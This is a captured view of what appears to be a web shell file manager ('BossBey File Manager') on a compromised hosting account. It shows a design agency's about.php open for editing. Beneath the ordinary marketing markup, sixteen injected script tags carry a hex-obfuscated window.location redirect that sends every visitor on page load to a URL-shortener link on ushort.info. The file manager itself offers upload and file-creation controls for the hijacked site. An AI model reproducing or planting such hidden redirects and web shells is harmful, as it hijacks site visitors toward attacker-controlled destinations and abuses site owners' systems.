BossBey File Manager
PHP:
8.1.34
OS:
Linux
User:
ebookghostwritin
Root
/
home
/
demodesignproboa
/
public_html
/
Beyond
/
v1
📤 Upload
📝 New File
📁 New Folder
Close
Editing: about.php
<?php include 'include/menu.php'?> <?php include 'include/header.php'?> <!-- Hero --> <div class="iner-Banner"> <div class="swiper mySwiperHero"> <!--<div class="parallax-bg" style="background-image: url(images/hero-bg.png);" data-swiper-parallax="-23%"></div>--> <div class="swiper-wrapper"> <div class="swiper-slide"> <section class="techVerse_hero hoverEffectSec" style="background-image: url(./images/banner-bg1.webp)"> <div class="techVerse_heroContent"> <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <div class="techVerse_hero_content About_Content"> <h2 class="fill" data-text="ABOUT US">ABOUT us</h2> <!-- <h6>Welcome to Beyond browse</h6> --> <h1 data-aos="fade-right" data-aos-offset="0" data-aos-duration="1000"> Redefining Design Standards With <span class="color-lightBlue1">Tech-Driven Solutions</span> <!-- <div class="d-blxk"> That Resonate, Inspire, and Endure! </div> --> </h1> <p data-aos="fade-right" data-aos-offset="0" data-aos-duration="2000"> Our design ecosystem combines data and creativity to create solutions that are both strategically sound and aesthetically pleasing. Our dedication to technology progress guarantees that we consistently lead the way in design innovation, providing our clients with unmatched outcomes. </p> <div class="techVerse_hero_btns" data-aos="fade-right" data-aos-offset="0" data-aos-duration="3000"> <a href="javascript:;" class="btn_with_icon btn_secondary"> <!-- <img class="btn_with_icon_img" src="images/chat-icon.png" alt="" /> --> <span class="btn_with_icon_text">Request a Quote</span> </a> <a href="tel:<?php echo $locNumber; ?>" class="btn_with_icon"> <img class="btn_with_icon_img" src="images/phone-icon.png" alt="" /> <span class="btn_with_icon_text"><?php echo $locNumber; ?></span> </a> </div> <div class="hero_brands" data-aos="fade-right" data-aos-offset="0" data-aos-duration="3000"> <a href="javascript:;" class="hero_brands_img"><img src="images/clutch.png" alt="" /></a> <a href="javascript:;" class="hero_brands_img"><img src="images/trus-pilot.png" alt="" /></a> <a href="javascript:;" class="hero_brands_img"><img src="images/bbb.png" alt="" /></a> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> <?php include 'include/logosec.php'?> <!-- About Sec --> <div class="Sec-011"> <section class="techVerse_about hoverEffectSec" id="particles-js1"> <div class="icon-container-hover"> <img class="techVerse_about_icon1 animation11" src="images/pink-capsol.png" alt="" /> <img class="techVerse_about_icon2 animation33" src="images/Pill.png" alt="" /> <img class="techVerse_about_icon3 animation11" src="images/green-cube.png" alt="" /> <img class="techVerse_about_icon4 animation11" src="images/donat-orange.png" alt="" /> </div> <div class="techVerse_aboutContent width-1600"> <div class="container-fluid"> <div class="row"> <div class="col-md-6"> <div class="techVerse_about_content"> <div class="sec_title"> <h2 class="sec_title_head " data-aos="fade-up" data-aos-offset="0" data-aos-duration="1000"> Standing Out <br> from <span class="color-lightBlue2">the Crowd </span> <div class="dlb"> </div> </h2> <p data-aos="fade-up" data-aos-offset="0" data-aos-duration="2000"> At Beyond Browse, we set ourselves apart with a special fusion of technological know-how, creative problem-solving, and a strong dedication to client success. The core of our design process is to comprehend the essence of your brand and transform it into an engaging visual language. Innovative design thinking and data-driven insights are combined to produce solutions that not only fascinate but also yield real outcomes. </p> <p> What sets us apart is our commitment to creating enduring relationships. We work closely with our clients to build transparent and cooperative relationships, making sure that their vision is central to each project. Our talented team of engineers and designers is dedicated to producing outstanding work and is passionate about what they do. We aim to surpass rather than merely meet expectations. </p> <div class="techVerse_hero_btns" data-aos="fade-up" data-aos-offset="0" data-aos-duration="3000"> <a href="tel:<?php echo $locNumber; ?>" class="btn_with_icon"> <img class="btn_with_icon_img" src="images/phone-icon.png" alt="" /> <span class="btn_with_icon_text">Call Now</span> </a> <a href="javascript:;" data-toggle="modal" data-target="#staticBackdrop" class="btn_with_icon btn_secondary blackcl"> <img class="btn_with_icon_img" src="images/chat-icon.png" alt="" /> <span class="btn_with_icon_text">Chat Now</span> </a> </div> </div> </div> </div> <div class="col-md-6"> <div class="techVerse_about_img"> <div class="techVerse_about_laptop_img "> <img src="images/about-1.png" class="about-laptopImg" data-aos="fade-right" data-aos-offset="0" data-aos-duration="1000" /> <img src="images/laptop-1.png" class="laptop-Frame frm-1" data-aos="fade-left" data-aos-offset="0" data-aos-duration="1000" /> </div> </div> </div> </div> </div> </div> </section> </div> <?php include 'include/archi.php'?> <section class="Partner_Sec"> <div class="container"> <div class="row"> <div class="col-md-5"> <div class="collab-img"> <img src="images/partner-1.png" alt="" class="w-100"> </div> </div> <div class="col-md-7"> <div class="Collab-Text"> <h2>Client-Centric <span>Focus</span></h2> <p> Our steadfast dedication to our clients is the foundation of all we do. We are committed to forming solid, long-lasting alliances based on mutual respect, candid communication, and a common goal. We go above and above to make sure you are completely satisfied since your success is our success. </p> <h2>Design Innovation</h2> <p> We have a strong commitment to advancing design and being ahead of market trends. Our group is always investigating new concepts and technological advancements to provide original, cutting-edge solutions. In our opinion, design should be both aesthetically pleasing and strategically sound, generating tangible outcomes for your company. </p> <h2>Collaborative partnership</h2> <p> We are aware that the process of design is collaborative. We collaborate closely with our clients to fully grasp their objectives, target market, and brand identity. Through transparent communication and active participation throughout the design process, we guarantee that the finished result precisely reflects your vision. </p> </div> </div> </div> </div> </section> <?php include 'include/process.php'?> <?php include 'include/testi.php'?> <?php include 'include/footer.php'?> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30";</script>
Save
Cancel